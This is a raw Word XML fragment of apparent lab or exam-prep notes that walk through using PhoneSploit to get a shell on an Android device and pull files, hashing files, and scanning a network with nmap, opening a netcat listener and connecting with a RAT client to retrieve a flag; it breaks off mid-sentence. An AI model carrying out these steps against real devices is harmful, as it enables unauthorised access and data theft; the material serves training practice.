      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>python3 phonesploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="36ADC8CA" w14:textId="752D5ED9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="5CAEB065" w14:textId="299614B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Type 4, to Access Shell on phone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="52EA3FCC" w14:textId="6309E745">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download File using PhoneSploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="176A50EC" w14:textId="18B9067F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Type 9, Pull Folders from Phone to PC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="7B548553" w14:textId="73471808">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Enter the Full Path of file to Download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="14827B09" w14:textId="325D75EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sdcard/Download/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="76BB50AC" w14:textId="2E6ECE2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">o calculate the sha384 hash of the file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="524ED453" w14:textId="4889C523">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sha384sum /path/to/your/file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="05FEA881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</w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="023FF941" w14:textId="2E8B517A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1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  ***To calculate entropy use:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We've three elf files, now we need to calcolate entropy for each of them using this command: </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ent file.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="25AF3098" w14:textId="4B142C57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noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>If ent not installed then:</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05FEA881" w:rsidP="5B4D83BD" w:rsidRDefault="05FEA881" w14:paraId="14659BB4" w14:textId="7743A4A0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noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="05FEA881">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt install ent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B4D83BD" w:rsidP="5B4D83BD" w:rsidRDefault="5B4D83BD" w14:paraId="17640C21" w14:textId="34BB2CB3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="6AB52C66" w14:textId="5AB49D84">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="086BDCD4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="65A47C4F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Step 1: run nmap scan on 192.168.0.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="40C15A8D" w14:textId="303B5241">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O 192.168.0.0/24 -</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap_output_0.0.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="18B359AA" w14:textId="2EEC2613">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: From the </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output find the windows machine. And see the ports running for windows </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>machine.for</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> example :1177, 8003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="3308236E" w14:textId="38DF5148">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Step 3: start netcat listener on parrot machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="216FCA43" w14:textId="3E4FC7E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Cmd: netcat -lvp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="3A48E13C" w14:textId="08272981">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="571767FE" w14:textId="6EDBD8B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>4 :</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> now we will have the connection with the windows machine from </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>here.Search</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the sa_code.txt and get the answer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="3B0A3BCF" w14:textId="2C6B0E78">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> basics https://www.kalilinux.in/2021/01/netcat-linux-tutorial.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="28052FF4" w14:textId="60354ABD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Answer 02:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="73AF1150" w14:textId="77FB2CCE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step1. find the windows machine </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="4B68ACC8" w14:textId="4D7E3EF5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Cmd:Nmap -O network/ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="5E83D3FE" w14:textId="3DCAD5C5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>step2: find the open ports for windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="04F3651E" w14:textId="77485321">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd: nmap -p- --open &lt;windows_ip   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="55780925" w14:textId="04954DFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>step3: search google using the open ports.From google you will find the RAT name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="66FF8D67" w14:textId="200E8CBB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ex: which rat tool use port 1177</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="092B22F0" w14:textId="20E2D406">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">step </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>4:Open</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the rat application and enter the </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>port.The</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine will </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 RAT </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>application.Only</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 would </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>work.Hints</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Some</w:t>
      </w:r>
